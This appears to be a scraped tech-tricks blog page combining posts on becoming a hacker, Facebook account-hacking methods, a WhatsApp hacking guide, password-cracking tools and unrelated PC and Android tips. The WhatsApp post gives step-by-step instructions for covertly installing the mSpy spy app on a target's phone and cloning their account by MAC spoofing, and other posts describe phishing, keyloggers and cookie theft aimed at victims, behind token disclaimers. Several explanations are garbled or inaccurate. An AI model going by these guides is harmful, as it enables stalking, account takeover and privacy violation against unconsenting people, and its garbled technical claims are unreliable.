Techno Tricks

What are the requirements to become a Hacker?


But don’t expect this tutorial to be Technical. It is more of a general guidelines and advices which you should know before even starting Learning to Hack.


Requirements to become a Hacker:- 


Being a hacker really only have two requirements. First and foremost that you have the right personality and secondly that you ask the right questions to the right person.

On the first requirement, I have no way of knowing if you have the right personality or not. Most likely, you don’t (since most people don’t have the curiosity and tendency to learn more things). Most people are quite normal, and normal people don’t make hackers. I don’t know why people seems to forget that Hackers are Super Geeks who don’t work like the same as most people do and don’t care about the stuff that most people do. Real hackers are not Cool, Real hackers are Geeks.

If you are asking me “What steps should I take to become a Hacker” or “What are the requirements to become a Hacker”, Then On the Second Requirement, you are already doing it wrong. You are asking the wrong question to the wrong guy.
The right question is “How does XXX works?”. XXX being every little tiny detail you can think of regarding computers, networks, servers, etc., and the Right Guy to ask is Yourself.

A Hacker does stuff that nobody has done before, finds vulnerabilities and techniques that nobody knew existed. The only person a hacker can ask is himself because nobody else knows anything about what he is doing.

If you really have what it takes to become a hacker, then there will be about 10 million little things that you want to know how they works and you don’t have the time to sit and wait for other people to explain in writing how it works. Asking on Facebook, Quora or any Social Media platform never made anybody a hacker and if you have to ask where to start, you clearly don’t have what it takes. A hacker would let his curiosity lead him and he would be far too busy finding stuff out to ask.
I would like to advice you that stop waiting for other people to teach you anything, If you seriously want to become a Hacker. Please don’t get disheartened by these strong words which I said in the Post. Just Keep learning new things, Don’t get intimidated, and let your curiosity lead you.

Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.

How to Get started with Hacking?


We get a hell lot of questions like “Where do I start with Hacking?” , “How can I get started with Hacking?” and “Where to start with Hacking” .

Today, we will answer this question right here. So, tighten your seat belts as here we go!

Where to start with Hacking?

I have seen a lot of members asking for a tutorial on “where to begin with hacking”. So here is my opinion about how they should get around starting. But First of all, let’s discuss about the types of Hacker.
Types of Hacker:-

There are generally 3 types of skilled Hackers:
  • Hat Hackers
  • Black Hat Hackers
  • Gray Hat Hackers
Hat Hackers:-  Hat Hackers are people who hack into systems or networks for betterment of their computers. They don’t do it with unethical intentions, instead they do it so that they can know the way other hackers can do, and then they fix the security hole, if there is any. hat hackers are mostly security experts. They are usually hired by companies to test the company’s computers security. Bounty Hunters and Penetration testers are other names of Hat hackers.

Black Hat Hackers:- 
Black Hat Hackers are totally opposite to hat hackers. They hold unethical intentions and break into computers or networks for their own taste. Black hat hackers are also known as crackers. These types of hackers continuously keep an eye on victim computer’s vulnerability, as soon as they find it, they break into it for malicious intentions. These types of hackers are engaged in almost all types of cyber crimes, such as ID theft, money stealing from Credit Cards, piracy of paid content and so on. They can use malicious websites and malicious softwares to start their journey in victim’s network.

Gray Hat Hackers:- Gray Hat Hackers have both hat and Black hat hacker’s habits. They surf the internet and look for a vulnerable computer system, network or phone system. Once they find one, they hack into it and inform the administrator what or how they have done it. They usually charge a small fee to fix the vulnerability. That’s why they are Hat hackers too. But they do it all without any permission from owner of website, computer or network, this way they are black hat hackers.
Where to start?

Now, let’s move to the actual question “Where to start with Hacking”. You should know the answer to these questions before you start your hacking career:
  • Which type of hacker do you want to be ( Hat, Black Hat or Gray Hat)?
  • Which type of hacking do you want to work with (Website Hacking, System Exploits, Penetration Testing etc.)?
  • What is your end-goal?
You must meet these requirements to become a successful Hacker:
  • You should be patient.
  • You should dedicate a lot of time to Hacking. You should never stop learning, since Hacking is a lifestyle.
  • You should be interested in how the different computer systems works, and how to control them.
Now when you have an idea of what kind of hacker you want to be, we will look closer into the different topics you can work with as a Hacker.

Website Hacking:- You might have already guessed it that Website Hacking is about hacking websites. You have to use your skills to find exploits and vulnerabilities in websites and web applications. Almost all major hacking stories in the news are about websites and databases that have been hacked. Once you have enough experience in website security, you will be amazed about how easy it is to find vulnerabilities in websites. However, it will take a lot of effort and time to reach that level of skills. You will need to know a large amount of server-side languages and Web Development languages/technologies like HTML, PHP, JavaScript, SQL, Ruby. These are just some of the languages you should know about. I will recommend you to take JavaScript, SQL and PHP very serious since mostly the websites are using PHP & MYSQL at Server-side and in these languages you will find the most vulnerabilities.

Code Exploiting:- 
Not many people know about this. This will require you to be a complete expert at programming. You should be at least as good at these programming languages as your mother tongue like English. This kind of Hacking will take a lot of time, and will require you to be patient. Do not get me wrong, every company that releases software like Symantec, Google, Microsoft, Adobe, and Oracle have hackers with these skills employed to check their software for vulnerabilities. Sadly, they cannot find every security hole and therefore some very smart black hat hackers are able to find them, and exploit them before the companies get the vulnerability patched. You should know the most popular languages like C/C++ and Java, etc.

Penetration Testing and Forensics:- Penetration Testing and Computer Forensics can earn you big money. It is these guys whom the company calls when they have been hacked. They are experts in operating systems, wireless connections and exploiting computers. This way will take a lot of time and effort since there is so much you should know about. You shall know about how the different operating systems works, which bug is there, how to exploit them, routers, encryption, malware etc. The list is almost endless.

Computer Security:-
 The work these people do looks a lot like the Penetration Testers. These people are able to detect and analyse new viruses and malware. They are working for companies like Symantec, KasperSky and Avira etc. Some of them are also working on labs that tests Antivirus and new viruses. They are experts in how viruses works and how they infect systems.

Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.

Facebook Hacking Techniques 


 Phishing

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.

 Keylogging

Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.


 Stealer's

Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are software's specially designed to capture the saved passwords stored in the victims Internet browser.

 Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections

Sidejacking attack went common in late 2010, however it's still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.

Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.

How to Hack WhatsApp Account (UPADATED)





    

                             Need to Hack WhatsApp Account?
      Below is a WhatsApp Hack Guide with Complete Instructions!


Learn how to hack WhatsApp in simple steps with the following easy to follow and foolproof tutorial. Since WhatsApp has become one of the popular app to share messages and media instantly, it has also become a favorite place for many to engage in illicit activities. Therefore, in order to investigate the truth people are left with no choice other than to hack WhatsApp account.

Possible Ways to Hack WhatsApp


The following are the only two ways to hack WhatsApp account:


1. WhatsApp Hack using a Spying App: The Easiest Way





Even though there are several ways to hack WhatsApp, using a spy app is by far the most simple and easiest way. This method requires no prior hacking knowledge or technical skills to carry out and hence more suitable for common people. Installing a spy app to hack WhatsApp is as simple as installing any other app on mobile. Out of several apps out there, mSpy is one of my favorite one to hack WhatsApp:





mSpy Features:


  • Hack phone Calls and Text Messages.
  • Hack WhatsApp, Skype and other popular messengers.
  • Track Real-Time Location with GPS Tracker.
  • Spy on Contact List and Web Browsing activities.
  • Monitor Emails, Pictures and Videos.
  • Operates in Hidden Mode and remains Undetected!
  • No Rooting Required!

How to Hack WhatsApp with this App?


  1. Download and Install the app on to the target phone which takes not more than a minute.
  2. After this is done, the app silently records all WhatsApp activities in hidden mode.
  3. All the recorded WhatsApp chat is sent to your online account.
  4. View all the information from anywhere at anytime with your online account.

You can download mSpy from the link below:



Compatiblity: Android, Apple iPhone, BlackBerry and Windows Mobile.

2. WhatsApp Hack by Spoofing Mac Address: The Tough Way


There is another method to hack WhatsApp known as Mac address spoofing which involves spoofing the Mac address of the target phone on your own phone. Unlike using spy apps, this one is somewhat time consuming and requires technical skills to implement. To spoof the Mac of the target WhatsApp phone address, follow the below mentioned steps:
  1. Find out the Mac address of the target phone on which you need to hack WhatsApp account:
    • For Android – Navigate to Settings —> About Device —> Status—> Wi-Fi MAC address
    • For iPhone – Navigate to Settings—> General —> About —> Wi-Fi address
  2. Once you’ve the Mac address of the target WHatsApp phone, you can spoof the Mac address as mentioned in my post: How to Spoof the MAC address.
  3. Next, install WhatsApp on your phone using the target phone number and verify it.
  4. Now, you’ve an exact replica of the target WhatsApp account and you should receive all the conversation and updates on your phone as well.
This method of WhatsApp hacking is quite time consuming and is known to have less success rate when compared to the method of using the spy apps. Therefore, if you are someone who does not have sufficient time and skills to implement this, I still recommend the use of mSPy to successfully hack WhatsApp account.

! DISCLAIMER: USAGE OF SPY APP WITHOUT PRIOR USER CONSENT MAY BE AGAINST YOUR LOCAL LAWS AND YOU DO IT AT YOUR OWN RISK!

Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.

How to become A Good Android Developer






 Imagine what your android smart phone would be without those apps that you love so much. Starting from the apps that you use to access your social media pages and games, apps are essentially make your phone what it is.
           Our lives today are so dependent on apps and there are new ones being developed daily for different purposes. The apps have touched our lives in a way that if today they were to disappear from our phones life would never be the same again. Imagine if you did not have that app that you use for your diet program or work out? What if you were unable to access your favorite social media site because you did not have an app to do so?


The importance of apps for the smooth running of our daily lives cannot be overemphasize. This is especially so with the increased migration from desktop computers to smartphones and tablets. Development of apps is slowly becoming a simpler task that anyone can do after a few lessons. However, developing a functional app that can be used by many people is still a challenge to many developers. Developing an app is easy; developing a good one is the more difficult part.

Important tips on developing a good app

Be willing to learn. Just like anything else in life, your willingness to learn will determine if you are able to make a great app or not. App development may not be rocket science but it is also not as simple as taking a cup of tea. Willingness to learn and a little dedication will ensure that you learn all the coding necessary to develop an app fast.

Basic knowledge in some specific areas like XML and Java is an added advantage. This acts as a good foundation of any android developers to build on. Knowledge of these areas makes your learning much easier and faster as you are able to grasp the concept behind app development quicker. However, if you know nothing about any of this it does not mean you cannot become a good app developer. Everything you need to know can still be taught to you.

Trial and error is a good learning experience. In the beginning you may create terrible apps but this shouldn’t discourage you. In a learning process you get better after trying a couple of times. It is through trying that you will be able to identify the areas you are not good at. After a couple of trials you will start noticing some improvements which should encourage you to push on.

Make it as simple as possible. What kind of apps do you like on your phone? Chances are you like the ones that are simple to use. This is the same for most people and so when developing an app the simpler it is the better. Most people learning how to develop apps fail because they are always focusing their effort on developing something very complex. Remember that simple does not mean that your app is substandard.

Focus on the real world. The most successful apps are the ones that try to emulate the real world as much as possible. Unless you are creating a game then the real world should be your main focus when learning and developing your app. When doing this also keep in mind that the purpose of an app is to make things better for its users.

Where to learn

When you think about that magnificent app that you enjoy using so much you assume it was created by a tech graduate from one of the best colleges in the world but that is not necessarily true. Learning how to make an app is quite simple and you can do it online from the comfort of your home.

Some of the good websites you can learn app development would include.

1. Developer Android


Developer Android is Google’s official android app development page. Here you will find all the materials you will need to learn app development.

2. Treehouse




This is a subscription based program but very rich in resources. Here you will get to learn all the basics of app development and also all the complex stuff you will need at a later date.

3.Udemy

Udemy also has a very good course on app development. It is a good place to learn especially for those without prior knowledge.

Top 5 Best Hacking Tool Mainly Used by Hackers






Top 5 Best Hacking Tool





Armitage



Armitage is best GUI form of Metaploit Framework. Metasploit is one of the best tool for ruuning and handling exploit on Linux.Many Professional Ethical-Hackers and Pentesters also use this tool for testing security on Network.Armitage is best tool for break the security of network. Armitage is preinstalled in Kali OS Latest Version.







Hashcat



Hashcat is the self-proclaimed world’s fastest CPU-based password recovery tool. It is one best tools cracking password.This hacking tool can done all type of attack and decrypt your hash.


Basically hashcat use for brute-force attack,dictionary attack,hybrid attack and rule based attack.

Hashcat is preinstalled in Kali OS.

Wireshark


Wireshark is free and open source packet analyzer for Linux and Windows.This tool can capture all type of packets in connected network.Wireshark can sniff all type of data in network.Preinstalled in Kali.




Social Engineer Toolkit (SET)


SET is collection of some best exploits for hacking.This is best exploit tools of phishing,spoofing and daoing lots of stuff.This is preinstalled in Kali OS


Wifite



Wifite is tool for hacking wifi password.This wifi hacking tool can hack almost all type of encrytion like WPA,WEP and WPA-2.


Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.

Track Lost Android Phone without Installing any App


Buy new android phone and want to know, what is the first thing to do in android mobile ? My advice is to enable Android Device Manager on your android phone.


Android Device Manager helps you to track your lost android mobile without installing any app on your phone.

You can find this feature in your android mobile settings.

Track Lost Android Phone without Installing any App

Track Lost Android Phone without Installing any App


Android Device Manager is an inbuilt feature in the latest version of the android phone. You can track your android phone with this feature.  You can lock and erase your mobile data remotely with the help of android device manager.


Activate Android Device Manager in Android Phone


1. Go to Phone Settings -> Security -> Device administrators

Android Device Manager Settings in Phone
                                       Android Device Manager Settings in Phone

2. Now activate Android Device Manager in Phone.
Activate Device Manager in Phone
Activate Device Manager in Phone

Make Sure you enable Location access from your Phone Settings.

Enable Location Settings in Android Phone

How to Find Phone from Android Device Manager Website



1. Open Google Play Store Website from this link Google Play Homepage.


2. Login with your Google ID.

3. Click on the gear icon and select Android Device Manager.

Google Play Store Website
4. Now Android Device Manager tracks your phone and give you the exact location of your android phone.
Zoon in for Exact Location Android Device Manager

Zoom in for Exact Location-Android Device Manager 
5. You can Ring your android Phone from a click on Ring. If you lost your android phone at the home, this feature helps you to find your phone.
6. Click on Erase button for remotely erasing all data on your android phone.
Delete All Data - Android Device Manager
Delete All Data-Android Device Manager
7. You can change the password of your android phone remotely from Lock button.
Lock your Device - Android Device Manager
Lock Your Device-Android Device Manager
Android Device Manager is one of the best ways for track your lost android phone. But this method required working internet connection.

Click Here To Watch The Video



DOWNLOAD BACKTRACK 5R3 FREE - LATEST (32 & 64 BIT)

If You are here to Download Backtrack 5r3 Free - Latest (32 & 64 Bit) So, You are Landed at Right Webpage because here we Discuss all BackTrack 5 R3 and Below we also Share the Direct Download Backtrack 5r3 Free - Latest (32 & 64 Bit)

BackTrack 5 R3 is one of the Most Powerful Linux Distribution used for Penetration and Find Loopholes in Websites, Software and Application. Basically, it is Based on GNOME Linux Distribution and Include many of Top used Security Tools Like MetaSploit, Wireshark, AirCrack, Nmap and other Digital Forensic Tools. BackTrack 5 R3 is Developed by Offensive Securities and Soon They are Stop BackTrack Linux Series. The Last Edition of this Operating System is BackTrack 5 R3 and Further They Starting a new Project that is also a Newest Version of This Operating System Known as Kali Linux. It is the Successor of Backtrack 5 R3 and Include all the Tools that you have in BackTrack 5 R3. BackTrack is also Found as Best Operating System Used by Hackers.

sttechnotricks


There are Millions of Security Researchers ( Hat) who use BackTrack 5 R3 for Digital Forensics, Testing Systems, Networks and Other Penetration work. But On the Other Hand, It is also the Favourite Operating System Picked by Hackers because of their Tools and Features. Hackers and Crackers use this Operating System, not For Testing Instead to Breaking Systems, Cracking Passwords, Hacking Accounts and other Notorious Work. BackTrack have all the Deadly Tools and Programs that you need to Break the Digital Systems. The Last Edition of BackTrack 5 R3 is released on August 13, 2012. After that, They Start Project Kali.


  • Features of BackTrack 5R3:

  • Available in Different Flavours.
  • Include all Hacking Tools.
  • Preinstalled Digital Forensics.
  • Simple and Easy Interface.
  • Open Source for All People World Wide.
  • Preinstalled Drivers.

Download Backtrack 5r3 Free - Latest (32 & 64 Bit) with Below Links:

sttechnotricks


Here are some popular tricks to hack accounts and get their passwords:



1.Password hashes:

Passwords that you type in your computer operating systems are stored somewhere on the disc in the form of hashes.These hashes are not in clear text therefore to access these hashes root/sysadmin privilages are required.In windows operating system these hashes are stored on the local disc in the SAM file,while in linux stores these hashes in /etc/shadow file.Hence to encrypt out the password out of these hashes the root access is required and therefore the password can only be cracked by this process only if the operating system can be in your control for some time or you can use the system by your own.



a)Dictionary:

Using dictionary attack to find the password out of hashes is the simplest and fastest method.It just runs through dictionary of words and tries each one of them to check whether it works or not.It could seem to be impossible if it has to be done manually as one cannot try so many passwords at a time but the best thing is that your computer can do so in just a minute or even less to find up the password.Use this trick and find out the password from the hashes where some programs available on internet will help you find the correct password out of the bundle of text of hashes.


b)Rainbow table:


Most systems now a days uses hashes to store the password but as we know these hashes are encrypted files.To crack up the encryption is to take the dictionary file that we has found in above step and hash it again and then compare it with the hash file that was accessed previously from the system.That takes a lot of time and uses intense CPU but this process checks the password that we got through dictionary of hash file to be correct.


2.Using Software to hack:


There are many softwares available on the internet that do help you to crack the various accounts.These softwares uses some commands and some information to find the encrypted pasword and then crack it.Some softwares can even hack the accounts in few minutes which is great but every password cannot be cracked by this method.Still this method is used mostly to crack the accounts as it the easiest method to do so.You just has to provide the required information and the rest of process will be done by softwares only.


Here are some of the best hacking software used till date:


a)John The Ripper:


The world’s best known tool to crack up the passwords that can crack up the password for linux operating system strictly using the command line.It uses built in default password cracking technology and attempts to crack password first by dictionary attack and if that fails it then tries combined dictionary words and still if that does not works it tries the hybrid attack of dictionary words with special characters and words.At last if that all does nothing then it uses its special brute force feature that will be enough to find the required account password.


b) Ophcrack:


It’s a free rainbow table-based password cracking tool for Windows and is among the most popular password cracking tools and can also be used on linux and mac systems.It crackes LM and NTLM hashes.Although this program can crack the password only if you have the hash file of the operating system without that it is of no use.Still it can probably crack most accounts.

3.Online account hacking:

Accounts can be hacked using online hacking tools that uses some information about the account and using that it can crack up the accounts.Online tools are pre programed to do so and can be the easiest way to hack passwords if you are familier with some of the information of account.Following are some of the best online hacking tools that you can use:


a)Brutus:


Many consider it to be the fastest online password hacking tool and is also free and available for both Linux and Windows.It supports password cracking in HTTP,POP3,FTP,SMB,Telnet and other types such as IMAP,NNTP,Netbus,etc.Brutus is open source tool and is best for doing online hacking of many types of accounts.


b) THC-Hydra:


Probably the most widely used online hacking tool that is capable of hacking web form authentication and when it is used with other tools like Tamper Data,it can become a powerful and effective tool for cracking nearly every type of online password authentication mechanism.


4.Password cracking Hardware:


These are special type of machines designed only to perform some type of operation to hack up the data or the accounts of the system when connected to it.These machines or these type of hardware is amazingly powerful and can perform any task in about 1 million of time that general hardware may take.These hardwares can be available on rent for hacking systems or accounts.Some of the best password cracking hardware are:


a)Botnet:


These machines are simply a function of brute force computing power and these machines are basically used for cracking the passwords in very very less time than that of general computers.The same can be done to network also and it can access about network of one million machines.


b)ASIC:


These are application specific devices that can work about to hack any system or account.These machines can work faster than over 100 CPU working togather.


5)Hidden Softwares:


Look like if you are using someone else computer or smartphone and your account was found to be hacked after some days but you remember to log out all the sessions on that system.You could be amazed to know that your login could be recorded on the computer or smartphone by some sort of software or application that remains hidden to other people and can record their passwords and account data also.Here are some softwares that can do up the same trick:


a)Keyloggers:


Keyloggers is a specifically designed software that can record the account logins and send it to a file at a particular location in your storage.That records contain the account details and their passwords also.This software is very popular to hack the accounts if your device is used by others to access their accounts.


b)KeyCounter:


Similar software that also uses the recorded information like Keyloggers.This also is another popular software that is used to hack the accounts using hidden recording of the login details and password.


Conclusion: Hacking accounts is a no easy task even the professional hackers do fail sometimes to hack the accounts.Here in this article are the most accurate and easy ways that are even used by pro hackers also.These


ways are also mostly used ones to hack the accounts of almost any type.


Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.


Convert YouTube Videos To Gif By Adding Gif Before Yotube In Url

gifyoutube



View Hidden Password In Browser


newfbook



Search This In Google For Direct Mp3 Links



Search This In Google For Direct Mp3 Links






intitle:index.of?mp3 Your song name here


google-search-mp3


Delete Your Account Permanently From Famous Websites


delete-account



In Your PC Just Create A Folder With The Name Given Below And Access Everything



In Your PC Just Create A Folder With The Name Given Below And Access Everything

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}


godmode




To Undo An Undo Just Press CTRL+Y



Use Your Chrome Browser As Notepad Quickly.



Use Your Chrome Browser As Notepad Quickly.






Just copy the text below to the address Bar. data:text/html, Note: You can also bookmark this to use it anytime. 
new1



Delete One Word At One Time By CTRL+ Backspace


one-word-atone-time-delete


The Best Computer The Best Computer Tips and Tricks: Wireless Home Networking


Fix Connectivity Issues


It sounds crazy, but 95 percent of all Internet connectivity problems can be solved by power-cycling both the router and the modem. Turn them both off, and then turn the modem back on first. Once its "sync" or signal light comes on, turn on your router.


Use Encryption


You've probably heard this before, but it bears repeating: Always enable your router's wireless security! Wired Equivalent Privacy (WEP) encryption is the oldest (and weakest) form of security; the newer (and stronger) Wi-Fi Protected Access (WPA) and WPA-2 are the best protection available today for home users.


Update Your Router's Firmware


All routers include internal read-only chips with embedded instructions that can be updated by the manufacturer. Router manufacturers generally update a product's firmware to increase performance as well as to resolve bugs and security issues, so it's wise to keep your router's firmware up-to-date. Check the manufacturer's Web site for the latest updates.


Boost Your Wireless Signal


If walls and distance are causing wireless signal degradation, you can do a few things to boost it. Move your router to higher ground—the signal radiates downward. You can also try a signal extender (or repeater), which boosts the signal. Finally, high-gain antennas will work, but they only focus the signal in one direction.


Change Admin Password


Every router has a well-known default password that's used to access the router's browser-based configuration page. Most setup wizards will make you change this password, but not all do. If not, be sure to change it yourself to prevent unwanted hangers-on from changing your network's settings.


Go Back to Factory Settings

If you've lost or forgotten your router's login credentials, you can get around this predicament by resetting the router to its factory settings. Do this by holding down the button on the back of it for 30 seconds. Next, look in the manual for the default user name and password, and then change them on your router's browser-based configuration page.

Disable SSID Broadcast

Unless you disable it, your router broadcasts its service set identifier (SSID)—the name of your network—which allows your neighbors to see (and attempt to gain access to) your network. Instead, disable broadcasting, making the network appear as "SSID not broadcast." Access the unnamed network by typing in the SSID name when prompted.

Change the Default SSID

Change your pre-defined, default SSID—leaving it as "Linksys," for example, tells the world that you haven't configured your router, which invites attackers.

Filter by MAC Address

Every piece of networking gear includes a unique "fingerprint" called a media access control, or MAC, address. You can configure your router to filter connections using these addresses so that only your computers can connect to your network. Most routers will show you connected devices, so adding an adapter's MAC address is a one-click process.

Step Up to 5GHz

The majority of today's networks operate in the crowded 2.4GHz frequency range, which is shared by microwaves, cordless phones, and other home networks. To avoid possible interference, many new routers are capable of broadcasting at 5GHz, which has 23 wide-open channels as opposed to 2.4GHz's three non-overlapping channels.

Limit Your Number of DHCP Clients

Most people use their router as a DHCP server; when clients connect, the router dynamically assigns IP addresses from a large pool of addresses. Limiting that list to the number of clients in your home, however, will help prevent interlopers from hopping onto your network.

Use Your Router's Firewall

Two features make most hardware firewalls more powerful than software firewalls: stateful packet inspection (SPI) and network address translation (NAT). SPI examines packets' content and behavior before granting access, and NAT hides all PCs connected to the router from the Internet, "translating" their IP addresses into private ones that are unreachable from outside the firewall.

Change Your Channel

Wireless B and G (and some N) routers operate at the 2.4GHz frequency, which only has three non-overlapping channels: 1, 6 and 11. By default, your router will most likely be using one of these channels, and the bad news is so your neighbors' routers as well. If you experience dropped connections, sluggish performance or both, a good first step is to switch the channel. If it's set to channel 1, go to 11. If it's set to 6, try either 1 or 11 for best results.

Let Windows Control Your Wireless Networks

If a network adapter's software takes control of your wireless network, it can be difficult to put Windows back in charge. First, click Start, then Run, then type services.msc. Scroll down to Wireless Zero Configuration and start the service. Right-click your wireless connection, select view available networks, and then click advanced settings on the left. Click the wireless networks tab, and check "Use Windows to Configure my wireless network settings."

Disable File Sharing in Public

If you're in a public place with a Net connection, it's a good idea to disable File and Printer Sharing for Microsoft Networks. In the properties of your network adapter, uncheck the appropriate box. It's also a good idea to switch your notebook's wireless radio off if you aren't using it.


    Change Your IP In Less Than 1 Minute


              In my previous post i had show you how to Grab someone ip address now i will show you how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.

    • Click on "Start" in the bottom left corner of the screen.
    • Click on "RUN"
    • Type in "command" and click OK

          You should be now at MSDOS prompt Screen

    • Type "ipconfig /release" just like that, and press "enter"
    • Type "exit" and leave the prompt
    • Right-click on "Network Places" or "My Network Places" on your desktop.
    • Click on "properties"

         Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

    •  Right click on "Local Area Connection" and click "properties"
    • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
    • Click on "Use the following IP address" under the "General" tab
    • Create an IP address (It doesn't matter what it is)
    • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
    • Press the "Ok" button here
    • Hit the "Ok" button again

         Now you should be back to the "Local Area Connection" screen.

    • Right-click back on "Local Area Connection" and go to properties again.
    • Go back to the "TCP/IP" settings
    • This time, select "Obtain an IP address automatically"
    • Click on "Ok"
    • Hit "Ok" again.
    • Now you have a New IP address.

    Finding Ip Address Of A Website Using Command Prompt Or CMD




    In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

    How to find IP ?

    1. Go to Start > Type CMD and press Enter.
    2. Now write Ping followed by website URL whose IP you want to find.

    finding ip adddress of website

    3. It will take less then a second and come up with the results as shown below.
    finding ip adddress of website


    How to easily root an Android device



    Rooting is the Android equivalent of jailbreaking, a means of unlocking the operating system so you can install unapproved (by Google) apps, update the OS, replace the firmware, overclock (or underclock) the processor, customize just about anything, and so on.

    Of course, for the average user, rooting sounds like -- and can be -- a scary process. After all, "rooting" around in your smartphone's core software might seem like a recipe for disaster. One wrong move and you could end up with bricked handset.

    Thankfully, there's a new Windows utility that makes rooting a one-click affair: Kingo Android Root. It's free, and based on my initial tests with a Virgin Mobile Supreme and later ones with an Asus Nexus 7, it works like a charm. (Be sure to check the compatibility list before you proceed, keeping in mind that even if your device isn't on it, the utility may work with it.) Here's how to get started.

    Step 1: Download and install Kingo Android Root.

    Step 2: Enable USB debugging mode on your phone. If it's running Android 4.0 or 4.1, tap Settings, Developer Options, then tick the box for "USB debugging." (You may need to switch "Developer options" to On before you can do so.) On Android 4.2, tap Settings, About Phone, Developer Options, and then tick USB debugging." Then tap OK to approve the setting change.

    On Android 4.3 and later (including 5.0, though this also applies to some versions of 4.2), tap Settings, About Phone, then scroll down to Build Number. Tap it seven times, at which point you should see the message, "You are now a developer!"

    With that done, tap Settings, About Phone, Developer Options, and then tick USB debugging." Then tap OK to approve the setting change.

    Step 3: Run Android Root on your PC, then connect your phone via its USB sync cable. After a moment, the former should show a connection to the latter. Your device screen may show an "Allow USB debugging?" pop-up. Tick "Always allow from this                       computer," then tap OK.kingo-root-updated.jpg

    Step 4: Click Root, then sit back and wait while the utility does its thing.

    What is a RAT (Remote Access Trojan)?


    A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. RATs are usually downloaded invisibly with a user-requested program -- such as a game -- or sent as an email attachment. Once the host system is compromised, the intruder may use it to distribute RATs to other vulnerable computers and establish a botnet.
    Because a RAT enables administrative control, it makes it possible for the intruder to do just about anything on the targeted computer, 


    Because a RAT enables administrative control, it makes it possible for the intruder to do just about anything on the targeted computer, including:

    • Monitoring user behavior through keyloggersor other spyware.
    • Accessing confidential information, such as credit card and social security numbers.
    • Activating a system's webcam and recording video.
    • Taking screenshots.
    • Distributing viruses and other malware.
    • Formatting drives.
    • Deleting, downloading or altering files and file systems.


    The Back Orifice rootkit is one of the best known examples of a RAT. A hacker group known as the Cult of the Dead Cow created Back Orifice to expose the security deficiencies of Microsoft's Windows operating systems.

    RATs can be difficult to detect because they usually don't show up in lists of running programs or tasks. The actions they perform can be similar to those of legitimate programs. Furthermore, an intruder will often manage the level of resource use so that a drop in performance doesn't alert the user that something's amiss.

    To protect your system from RATs, follow the same procedures you use to prevent other malware infections: Keep antivirus software up to date and refrain from downloading programs or opening attachments that aren't from a trusted source. At the administrative level, it's always a good idea to block unused ports, turn off unused services and monitor outgoing traffic.


    How to use Pen Drive/Hard Disk as Ram to Speed Up Computer in Windows 7, XP, Vista, Linux

    Introduction:-
                 PC requirement of RAM is huge and because ram is very expensive memory so we try to minimize it by either using Hard Disk or PenDrive as RAM. Thou using hard disk and pen drive as RAM is very economical option but they are not as fast as the actual ram is so the ram space which is created through these opteration are used to store data of applications that are not currently active that is which have been stopped ,not closed but which we are not using currently.
               Among the two type of external ram, pen drive is faster one because pen drive is created using much faster disk technology then hard disk.

    How to use Hard Disk as RAM:-
    1.  Goto "My Computer"
    2. Now Right Click on Blank Space in My Computer or simply Right Click on My Computer Icon
    3. Now on right click menu that appears Left Click on  Property
    4. Now new windows will pop up here. if you are using XP then goto Advanced Taband if you are using Higher Version then Goto Advanced System Setting option on the right in the window that appeared and then Goto Advanced Tab of the next window.
    5. here you can see number of Setting Button, click the setting button which is under performance section
    6. now in the window that appeared Goto Advanced Tab
    7. now in Virtual Memory Section you can see the currently allocated space and if you feel it is not present or used in less amount then click on the change button and increase the value in the window that appears

      Note:- you can also see the below figure if you have any doubts
    8. How to Use Pen Drive as RAM:-
      1. First Step is identifying Software Needed 

        For XP or lower:- eboostr (download from here and install it).
        For Vista or higher:- readyBoost  (already present).
      2. Now attach/insert your pen drive to computer.
      3. Now to use readyboost on windows 7
        • Goto Property of Pen Drive by right clicking the pendrive icon in my computer
        • now click to readyBoost tab on the window that appears
        • now as you can see from the figure first press "Dedicate this device to readyboost" radio button
        • then adjust the memory you want to give to ram from Pen drive
        • and thats it!!

          Now to use eboostr in Windows XP
          • first you need to install eboostr onto your computer and then restartthe computer as asked by the software
          • then open eboostr control panel from start menu
          • now click continue button if you have trail version
          • now you have to add one of the drive to Eboostr Control Panel by click add and then selecting one of the drive and you need to specify disk space there itself.



      12 Simple Steps To Become A Hacker


      Steps to become a hacker


